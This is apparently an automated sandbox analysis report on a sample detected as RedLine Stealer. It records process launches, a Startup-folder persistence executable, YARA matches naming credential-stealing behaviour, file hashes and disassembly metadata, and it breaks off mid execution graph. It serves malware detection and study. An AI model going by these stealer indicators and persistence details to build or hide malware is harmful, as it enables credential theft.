                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2902535107.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2954888933.00000000039AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894335266.0000000003958000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2894468357.00000000038FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2951833914.0000000003A02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001D.00000003.2950664507.0000000003907000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 5%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:30
                                                          Start time:23:13:25
                                                          Start date:12/01/2024
                                                          Path:C:\Windows\SysWOW64\PING.EXE
                                                          Wow64 process (32bit):true
                                                          Commandline:ping -n 5 localhost
                                                          Imagebase:0x8e0000
                                                          File size:18'944 bytes
                                                          MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:31
                                                          Start time:23:14:02
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Local\Temp\7ZipSfx.000\28945\jsc.exe
                                                          Imagebase:0xfc0000
                                                          File size:47'584 bytes
                                                          MD5 hash:94C8E57A80DFCA2482DEDB87B93D4FD9
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3026594821.0000000001392000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.3034718882.000000000336B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001F.00000002.3034718882.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 0%, ReversingLabs
                                                          Has exited:true

                                                          General

                                                          Target ID:32
                                                          Start time:23:14:13
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                          Imagebase:0x460000
                                                          File size:4'608 bytes
                                                          MD5 hash:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 3%, ReversingLabs
                                                          Has exited:false

                                                          General

                                                          Target ID:33
                                                          Start time:23:14:21
                                                          Start date:12/01/2024
                                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
                                                          Imagebase:0xe90000
                                                          File size:4'608 bytes
                                                          MD5 hash:A5CE3ABA68BDB438E98B1D0C70A3D95C
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Executed Functions

                                                            Function 00007FFD9B4047E5 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1865976772.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d2926b7313eb4f4d0fffdcddef21ac1b47e6c0991d42b779595a8d4c8dfead8
                                                            • Instruction ID: f8921968ee6d0c3131ddedf5baf6fe2e29f792979c4e719becf4933e6bd71ff0
                                                            • Opcode Fuzzy Hash: 2d2926b7313eb4f4d0fffdcddef21ac1b47e6c0991d42b779595a8d4c8dfead8
                                                            • Instruction Fuzzy Hash: 8001677121CB0C8FD748EF4CE451AB6B7E0FB95364F10056DE58AC36A5D636E882CB45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Executed Functions

                                                            Function 00007FFD9B40B0FC Relevance: 1.8, Strings: 1, Instructions: 538COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Y_H
                                                            • API String ID: 0-219585648
                                                            • Opcode ID: 26fd1feae1cf9d1e573a414160656c7cc47cd06226913802cefae919f97dcd0a
                                                            • Instruction ID: 64870a15163cbc405c8de8ee287edcc81ba281c52cdd989a8964aaf00e80e9b4
                                                            • Opcode Fuzzy Hash: 26fd1feae1cf9d1e573a414160656c7cc47cd06226913802cefae919f97dcd0a
                                                            • Instruction Fuzzy Hash: DDF1F430A19A4D8FDB98DF5CC4A5AA977E1FF68304F15417AD44DD72A6CA34EC82CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D431D Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B
                                                            • API String ID: 0-1255198513
                                                            • Opcode ID: eff7e93920736dd0fdebd68ae2eace417d102d902c6c98f29db1345a78cef9fe
                                                            • Instruction ID: 2c42bf7b128793fda18c2fb5a6b3b2e4a77d531bf1a7f743f526fc9963765ccf
                                                            • Opcode Fuzzy Hash: eff7e93920736dd0fdebd68ae2eace417d102d902c6c98f29db1345a78cef9fe
                                                            • Instruction Fuzzy Hash: 27512632B0EA8D0FE7A9DB6C54655B57BE1EF95324B0A02BFD05DC31A3EA14BD058381
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D6C1A Relevance: .5, Instructions: 464COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9e76a0c9d31543534c94a957b0c32f35aaa2e6749b02bd52dff83935ff22ecf9
                                                            • Instruction ID: 53817653edc9e6a25352b073426041dabb2f0a97978e1769bf445c4911da4cd5
                                                            • Opcode Fuzzy Hash: 9e76a0c9d31543534c94a957b0c32f35aaa2e6749b02bd52dff83935ff22ecf9
                                                            • Instruction Fuzzy Hash: 9FD15972B0EA8D0FE7A5ABA888655757BE1EF95314B0902FFD44CCB0E3D928B905D341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B406D1C Relevance: .4, Instructions: 360COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: efb6ac4c7f1c083c065e3fc26b706f324f4b7fbc0bed87a1b712f4ec1e39dc6c
                                                            • Instruction ID: c74760f5fe24fc21cc8bf7a5f6e1193ba82a4b71958960d5a4c6383aaacdd33e
                                                            • Opcode Fuzzy Hash: efb6ac4c7f1c083c065e3fc26b706f324f4b7fbc0bed87a1b712f4ec1e39dc6c
                                                            • Instruction Fuzzy Hash: CCC17F31A18A4D8FDF98DF5CC495AA977E2FFA8304F15426AD449D7295CA34E881CBC0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B409AAA Relevance: .2, Instructions: 160COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d818b791c4d3ecfb937045576d03fc4daf725d1165dfb7f313647ef449aedbdf
                                                            • Instruction ID: ed946b564e73085666c80e0124ee8580fc3cca55178969a7c2423df6509978b8
                                                            • Opcode Fuzzy Hash: d818b791c4d3ecfb937045576d03fc4daf725d1165dfb7f313647ef449aedbdf
                                                            • Instruction Fuzzy Hash: F3415A72A1DE8E4FEF188B5CDC1E6A97BE0FF55320F04423FD48983192DA2579018B82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40A98C Relevance: .1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fa1a9a5b28c98c876506d10409173c52b029b388c94542a313fa8ee386da2284
                                                            • Instruction ID: 56f8b3702d97c344a21ccd15602be341ccca8b4ab5314757b5d01aa057e48b92
                                                            • Opcode Fuzzy Hash: fa1a9a5b28c98c876506d10409173c52b029b388c94542a313fa8ee386da2284
                                                            • Instruction Fuzzy Hash: DD41C531A0C78C4EEB19DBACD84A7E97BF0EB96331F04816BD089C3192D6756456CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B2EEB80 Relevance: .1, Instructions: 128COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759084209.00007FFD9B2ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2ED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b2ed000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f5ba3b8a711680477c44428bad65151c6c2725616a386bfe5bf0cbcd4484b27
                                                            • Instruction ID: d40e2261dab76e8b0c364b109704799c8cd81dec43ac4261af9e9cead817d72b
                                                            • Opcode Fuzzy Hash: 7f5ba3b8a711680477c44428bad65151c6c2725616a386bfe5bf0cbcd4484b27
                                                            • Instruction Fuzzy Hash: BD41487140EBC84FE7A69B3998519A23FF0FF52220B0601DFD089CB1A7D625A846C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40AA58 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 81c61e88a0d68af76f090f0724f1202307844701a6abad6c046fc66d22fdaf95
                                                            • Instruction ID: c0ab337c05d15fb90536a3ed6247bcdb2198915395e49450be2f86cccddc5c12
                                                            • Opcode Fuzzy Hash: 81c61e88a0d68af76f090f0724f1202307844701a6abad6c046fc66d22fdaf95
                                                            • Instruction Fuzzy Hash: F4219D32B1CA4D0FEBA8DB6C94956F477D1EFA5325F0402BBC05CC32E2DA55A8138B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B403678 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 952aa5b9115fc0b5a3a9e360038a49706df948729446d2f01274d0907e9328aa
                                                            • Instruction ID: c7e5d8f2e62c2b90643ed55992d06f9dcb5d3146dfde35b57b1d3c717291c7e7
                                                            • Opcode Fuzzy Hash: 952aa5b9115fc0b5a3a9e360038a49706df948729446d2f01274d0907e9328aa
                                                            • Instruction Fuzzy Hash: 8E21CE62A0E7CA4FE7628BACD8260E53FB0DF57224B0A01FBD4C5871A3D50A68469B51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D43BC Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f77dfbeabed2ce800872a33bf4d1830ea0672ec6fdc7956d3e185c7ea7f27e7
                                                            • Instruction ID: f80e725e42908c2120f7fd0a40783fbd5bac0019113d0a2e873afb24b463a692
                                                            • Opcode Fuzzy Hash: 9f77dfbeabed2ce800872a33bf4d1830ea0672ec6fdc7956d3e185c7ea7f27e7
                                                            • Instruction Fuzzy Hash: 39110232B4F9490FEBB8DB6C94745B877D1EF8032874A02BEE05DC70A2DA18BD409380
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B403605 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction ID: 756be3dec80222bb223b3a781116992aa564b27880e7e8b88c63464b91de19fa
                                                            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                            • Instruction Fuzzy Hash: 3701A77021CB0C8FD748EF4CE051AA9B7E0FB99324F10056DE58AC36A1D636E881CB41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40C0C3 Relevance: .0, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50f7aefedb20850458a8ec40a2e91353b0bb45a38ca20b36624a12739faa8189
                                                            • Instruction ID: 575e94ce787cfe65abc3d4da6da94dc5f50734f4bff9cb52d9d5f4bd23454b80
                                                            • Opcode Fuzzy Hash: 50f7aefedb20850458a8ec40a2e91353b0bb45a38ca20b36624a12739faa8189
                                                            • Instruction Fuzzy Hash: 64F0303276C6044FDB4CAA1CF8529B573E1E799334B10026EE48BC3696D927E8438685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40C108 Relevance: .0, Instructions: 39COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78802729be72fc44c00077502d6d068842fc57a9b6f2a443d5e148e867e7550c
                                                            • Instruction ID: 5d31327386d60e6837800d56b1540041a5a4bd261ef4269e510c0603527517ca
                                                            • Opcode Fuzzy Hash: 78802729be72fc44c00077502d6d068842fc57a9b6f2a443d5e148e867e7550c
                                                            • Instruction Fuzzy Hash: 4BF0653276C6088FDB5CAA5CF8529B573E1EB99324B10017EF48BC3697D927F842C685
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D4146 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 51d0a868f22b663a4de551d96ded6127b3ca00e5663dc7071333f31ab7a2efc9
                                                            • Instruction ID: 9210442c24f2c4a37df8bb9d9470485e089250729a56e651937f19ac33ec4a69
                                                            • Opcode Fuzzy Hash: 51d0a868f22b663a4de551d96ded6127b3ca00e5663dc7071333f31ab7a2efc9
                                                            • Instruction Fuzzy Hash: 4BF0F032B0D9498FD769EB4CE4558A833E0EF94324B1201BAE05DC70A7DA26FC41C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D41D1 Relevance: .0, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction ID: 8f6b129acf456c359a7b59d9c53de0948d8b78166bef4011fc7b668e41017483
                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                            • Instruction Fuzzy Hash: B0E0E531B0C8089FDAB8DA4CE0559A973E1EB9833571202AAD14EC7561CA22FD519B80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40A608 Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74b27c37c14e3b07a638b4e63e7a12c1ce4d1d8ccd211bd2c090ba7b47c205eb
                                                            • Instruction ID: 491d427ff7db277153eba635b69f994fa5da572e386672387b223253d44b4605
                                                            • Opcode Fuzzy Hash: 74b27c37c14e3b07a638b4e63e7a12c1ce4d1d8ccd211bd2c090ba7b47c205eb
                                                            • Instruction Fuzzy Hash: 6CE09271804A8C8FCB55DF18C4594E97FE0FF68300B05019AE84DC7121D7709554CBC1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 00007FFD9B4047FA Relevance: 1.6, Strings: 1, Instructions: 380COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L
                                                            • API String ID: 0-2909332022
                                                            • Opcode ID: 3e86be8bcfdf5df26ef219d150505b82161ddd6dbe343edb81e72d1f1a744ee3
                                                            • Instruction ID: bb74b4a7dcb68676a63c96e4abe0cad99bfb94c40b38b3ed65b311d625263eb1
                                                            • Opcode Fuzzy Hash: 3e86be8bcfdf5df26ef219d150505b82161ddd6dbe343edb81e72d1f1a744ee3
                                                            • Instruction Fuzzy Hash: 7991E507B1A56201E30573FEB8664FD7F61EFC2276B0843B7D29D8A0D78C5910CA82E6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B4D2E11 Relevance: 1.0, Instructions: 1008COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1760094365.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b4d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc34c5be49a89de18fb935f718241ef05b72331c55359975ddc288b84281ac70
                                                            • Instruction ID: dca79f88cb7b4d5dc12762c1664cef39eed1b3840a0b4a972db98daa9be27415
                                                            • Opcode Fuzzy Hash: bc34c5be49a89de18fb935f718241ef05b72331c55359975ddc288b84281ac70
                                                            • Instruction Fuzzy Hash: 62525762B0EA8D0FE7A687AC58645B47BD1EFD6224B0A02FBD04DC71E3DD18BD069741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FFD9B40875D Relevance: 7.8, Strings: 6, Instructions: 282COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1759675568.00007FFD9B400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B400000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffd9b400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: L_^$L_^$L_^$L_^$L_^$L_^
                                                            • API String ID: 0-2894164595
                                                            • Opcode ID: 14561a7493f1c413a62b111d9a24e5bea34841ccaa2e8b9e2b2bfba1cb4fe508
                                                            • Instruction ID: b71d03019de3cc3867a6312fa587129b317f306b6cd8dc6920d646cabb92d39f
                                                            • Opcode Fuzzy Hash: 14561a7493f1c413a62b111d9a24e5bea34841ccaa2e8b9e2b2bfba1cb4fe508
                                                            • Instruction Fuzzy Hash: 35918053B1F6D61BEB6256B98C764E93FB0EF5235870E01F7C4E88B0A3ED1825069216
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:3.2%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0.8%
                                                            Total number of Nodes:877
                                                            Total number of Limit Nodes:25
                                                            execution_graph 60603 7ff7bad34a97 60604 7ff7bad34aa7 60603->60604 60607 7ff7bad3cf04 60604->60607 60606 7ff7bad34ac4 60624 7ff7bada9b44 60607->60624 60610 7ff7bad3cfa8 60612 7ff7bad3cf9a 60610->60612 60613 7ff7bad39c4c 16 API calls 60610->60613 60611 7ff7bad3cf5d 60611->60612 60631 7ff7bad39c4c 60611->60631 60615 7ff7bad3cfe5 60612->60615 60616 7ff7bad3cfd4 60612->60616 60613->60612 60620 7ff7bad3d004 60615->60620 60627 7ff7bad45880 60615->60627 60637 7ff7bad45768 91 API calls _get_daylight 60616->60637 60618 7ff7bad3cfe3 60622 7ff7bada9b44 _get_daylight 14 API calls 60618->60622 60620->60618 60620->60620 60638 7ff7bad3cddc 20 API calls __FrameHandler3::UnwindNestedFrames 60620->60638 60623 7ff7bad3d07b SetLastError 60622->60623 60623->60606 60639 7ff7badb9274 GetLastError 60624->60639 60626 7ff7bad3cf2b GetLastError 60626->60610 60626->60611 60629 7ff7bad458b9 60627->60629 60630 7ff7bad458f4 60629->60630 60678 7ff7bad33037 60629->60678 60630->60620 60632 7ff7bad39c5f 60631->60632 60632->60631 60636 7ff7bad39c8d 60632->60636 60965 7ff7bad3a008 16 API calls _cwprintf_s_l 60632->60965 60966 7ff7bad3cb7c 16 API calls 2 library calls 60632->60966 60967 7ff7bad3c940 16 API calls _cwprintf_s_l 60632->60967 60636->60612 60638->60618 60640 7ff7badb9296 60639->60640 60641 7ff7badb929b 60639->60641 60662 7ff7badb7bfc 6 API calls try_get_function 60640->60662 60645 7ff7badb92a3 SetLastError 60641->60645 60663 7ff7badb7c44 6 API calls try_get_function 60641->60663 60644 7ff7badb92be 60644->60645 60664 7ff7badb7638 60644->60664 60645->60626 60649 7ff7badb92ef 60673 7ff7badb7c44 6 API calls try_get_function 60649->60673 60650 7ff7badb92df 60671 7ff7badb7c44 6 API calls try_get_function 60650->60671 60653 7ff7badb92e6 60672 7ff7badb76b0 14 API calls 2 library calls 60653->60672 60654 7ff7badb92f7 60655 7ff7badb930d 60654->60655 60656 7ff7badb92fb 60654->60656 60675 7ff7badb8ea8 14 API calls _invalid_parameter_noinfo 60655->60675 60674 7ff7badb7c44 6 API calls try_get_function 60656->60674 60660 7ff7badb9315 60676 7ff7badb76b0 14 API calls 2 library calls 60660->60676 60663->60644 60669 7ff7badb7649 wcsftime 60664->60669 60665 7ff7badb769a 60668 7ff7bada9b44 _get_daylight 13 API calls 60665->60668 60666 7ff7badb767e RtlAllocateHeap 60667 7ff7badb7698 60666->60667 60666->60669 60667->60649 60667->60650 60668->60667 60669->60665 60669->60666 60677 7ff7badc8e60 EnterCriticalSection LeaveCriticalSection wcsftime 60669->60677 60671->60653 60672->60645 60673->60654 60674->60653 60675->60660 60676->60645 60677->60669 60682 7ff7bad46258 60678->60682 60695 7ff7bad3db08 60678->60695 60679 7ff7bad32420 60679->60629 60693 7ff7bad4627e 60682->60693 60686 7ff7bad46535 60711 7ff7bad717e8 60686->60711 60687 7ff7bad462e8 60687->60679 60689 7ff7bad4654a 60738 7ff7bad46594 60689->60738 60693->60686 60693->60687 60748 7ff7bad45b24 76 API calls _cwprintf_s_l 60693->60748 60749 7ff7bad60020 89 API calls _cwprintf_s_l 60693->60749 60750 7ff7bad45fe0 75 API calls 2 library calls 60693->60750 60751 7ff7bad72c18 16 API calls _cwprintf_s_l 60693->60751 60752 7ff7bad72b1c 58 API calls vwscanf_s 60693->60752 60753 7ff7bad63f48 16 API calls _cwprintf_s_l 60693->60753 60886 7ff7bad47ea8 60695->60886 60697 7ff7bad3db51 60699 7ff7bad3db58 60697->60699 60700 7ff7bad3db5f 60697->60700 60698 7ff7bad3db2d strchr 60698->60697 60703 7ff7bad3dba1 60698->60703 60893 7ff7bad4d0d0 60699->60893 60906 7ff7bad502e0 74 API calls 2 library calls 60700->60906 60908 7ff7bad3cb3c 16 API calls _cwprintf_s_l 60703->60908 60704 7ff7bad3db5d 60907 7ff7bad42d40 16 API calls 60704->60907 60707 7ff7bad3dbba 60909 7ff7bad3cb7c 16 API calls 2 library calls 60707->60909 60708 7ff7bad3db73 60708->60679 60710 7ff7bad3dbd7 60712 7ff7bad7183a 60711->60712 60713 7ff7bad71860 60712->60713 60773 